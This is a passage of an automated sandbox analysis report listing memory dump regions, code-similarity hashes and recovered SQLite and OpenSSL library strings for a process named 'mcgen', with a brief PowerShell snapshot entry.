                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                                                    • API String ID: 0-3733955532
                                                                                                                                                                                                                                                                    • Opcode ID: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
                                                                                                                                                                                                                                                                    • Instruction ID: d2fefbd18fea31072d92f9bd70494d98a956b17aff910cbbde79e367ec47dbdd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eaf877994def99b632411cebe2cf22a19285df91e40d12a58737d9fdeea6513
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A027E22B19A8385EE758BA1A4B437963A0BF86F85F08C535DE4E167A6DF3DE504C300
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                                                    • API String ID: 0-1087561517
                                                                                                                                                                                                                                                                    • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                                    • Instruction ID: c20f7b28ce9bf03ec0fc404a809b41f1716e518797d20b148333b43e5cc69960
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7ED11961B0EE4381FA50BF6295713B91293AF85784F844031DD0E6BB87DE3EE5458358
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 00007FFD94136795
                                                                                                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFD941367BE
                                                                                                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00007FFD94136ABE
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-272990098
                                                                                                                                                                                                                                                                    • Opcode ID: 970d39b844a7ba5ded7514ac1d1b25855ba9e19041e2948509ca3c7fa4e3a15f
                                                                                                                                                                                                                                                                    • Instruction ID: 9cdcdc3f06f098c53c8842277b38f689d0c364792a9e79b2e70b87308d62c790
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 970d39b844a7ba5ded7514ac1d1b25855ba9e19041e2948509ca3c7fa4e3a15f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FAD1D063B09B8586EB388B9594B47B97BA1FB46BC8F448532DE5D13786DE3CE441C300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
                                                                                                                                                                                                                                                                    • Instruction ID: 9530ce9f073c5df44acb387f21f7c95506679119c379713428cff013807d8664
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3655e22da9e07da38f3769848262744f944a14fbb408cd692dcf19944dac75b3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62D1BD72B08A8586DB68CF95A0907A9B7A1FF86B84F558032DE4D47B46EF3CD841D740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-3727861699
                                                                                                                                                                                                                                                                    • Opcode ID: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
                                                                                                                                                                                                                                                                    • Instruction ID: 1fade40746474b626ea6d63e4a5a14428ed103f18b1398758bac4689b7ee5a1d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77f1c398e4feca1772d8a54262c444990c89a142e1243c31ede2a848592e574a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE91DF23B086C186E724CB6692E16BE77A0FB42784F488176DB8E47A86DF3CE455D740
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFD94168AEF), ref: 00007FFD941687B9
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFD94168AEF), ref: 00007FFD9416883B
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,00000080,?,?,?,00000000,00007FFD94168AEF), ref: 00007FFD9416892D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-2313493979
                                                                                                                                                                                                                                                                    • Opcode ID: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
                                                                                                                                                                                                                                                                    • Instruction ID: 889058656443f0a0270fbf169f59382d8bfd5ec91dddcde8ff475bcdeab72064
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f63cdbfc781e1cc30f49cfbae50e1d6ec23c96147ccc90fbb7ff98d4043e38b1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6B17E23B09B8185E720CF56D4902A967A1FB96BA8F05C336DAAD177D6DF38E195C300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFD941178D7), ref: 00007FFD9411D5BA
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFD941178D7), ref: 00007FFD9411D5E4
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFD941178D7), ref: 00007FFD9411D637
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-2852464175
                                                                                                                                                                                                                                                                    • Opcode ID: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
                                                                                                                                                                                                                                                                    • Instruction ID: 896083c204e208cdcba9e3f96bdd204e210b11a4062fc9933062e6eff6f07e42
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94caf086f54589942c1a3f8dca44f9cf8cc577e0f8a3d8302a345ad245eb559f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1091AF67B2865186EB748B55D0A077967A0FB4AB98F148634DE9E17BC6CF3CF450CB00
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: %s.%s$column%d$rowid
                                                                                                                                                                                                                                                                    • API String ID: 0-1505470444
                                                                                                                                                                                                                                                                    • Opcode ID: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
                                                                                                                                                                                                                                                                    • Instruction ID: 1ce7160a61e2b91586182f2b9dc793be3601535f0b56095c3c13d890f7e642fe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de587f384be9fed1cc3d352f6a517015bb48ff4a3a33b04db7dd4cf98bea7dec
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54919A32B18B8285EA30CB95D4A43A967A4FB46BA4F448336DABC177D6EF3DD045C701
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-2410398255
                                                                                                                                                                                                                                                                    • Opcode ID: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
                                                                                                                                                                                                                                                                    • Instruction ID: 4a0bbb679dd1cf032c8266873901447680ca3dab0d5eab3a58921155c0614f58
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3637a19043f084d588f66de9b4ccfa5c358998dffeaae2edb35b3df82807b365
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C61D467B0869282E7249B66E1A027E6760FF47B98F108036EF4D27B96DF3CE451D710
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: string or blob too big
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-2803948771
                                                                                                                                                                                                                                                                    • Opcode ID: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
                                                                                                                                                                                                                                                                    • Instruction ID: 179785cd089447793bd40426a5bfbfc74f723e34cbfab18a79a79108c1f0b237
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8ac0a323bf9438d58d6516081a8c5b2cacbd73607acdce0e600ae5c24db9ecb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF919F22F0920285FA749B96D5B43792BA0AF82B98F048139DE4D273EBDE3DE445C741
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • 00007FFDAC063010.VCRUNTIME140(?,?,?,?,?,?,00000000,00000001,00007FFD9416D9BA,?,?,?,00007FFD9416DD7B), ref: 00007FFD9416D927
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFD940D0000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534859758.00007FFD940D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94231000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94233000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2534899570.00007FFD94248000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535144122.00007FFD9424A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2535182153.00007FFD9424C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd940d0000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C063010
                                                                                                                                                                                                                                                                    • String ID: CRE$INS
                                                                                                                                                                                                                                                                    • API String ID: 4157932375-4116259516
                                                                                                                                                                                                                                                                    • Opcode ID: f8dadf2cc8f17a0e3781b67facb98dc0a138e0cbf34f1f32e46277c3bbf8e1db
                                                                                                                                                                                                                                                                    • Instruction ID: 95be23fd940b68017cb4b6e84851d79179fa8fb5b95cf024540ec1f57fe86eef
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8dadf2cc8f17a0e3781b67facb98dc0a138e0cbf34f1f32e46277c3bbf8e1db
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C51CD22B1964281FA349BA694B43796395BF82FE4F58C135DE4D6B797DE3DE802C300
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2536395323.00007FFDA3341000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDA3340000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536355851.00007FFDA3340000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA33F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536395323.00007FFDA3403000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536743912.00007FFDA3407000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2536779033.00007FFDA3409000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffda3340000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Time$System$File
                                                                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                                                                    • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                                                    • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                                    • Instruction ID: 9f7f44be553ef275d6ef4ecc9e9e081b9fc8b2ee8f80a626d7bf211d5d564aa5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0801DBE2B19E4542DF54EB25F8111556791F7CC785B849032E74DCB766EE2DD2018740
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f59dfd4702aa8ab6fb52f9bfb88281c181fd1ae4d0f4db837cb2ce877425eef9
                                                                                                                                                                                                                                                                    • Instruction ID: 264307717e447c92dff831563db4c7251d45c979ab296cccabab2749e8faf435
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f59dfd4702aa8ab6fb52f9bfb88281c181fd1ae4d0f4db837cb2ce877425eef9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B816B31A1CA884FE759DF28C8956FABBE1EF56312F1401BEC08AC7193DA65A806C751
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.2314319409.00007FFD32CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32CF0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_7ffd32cf0000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
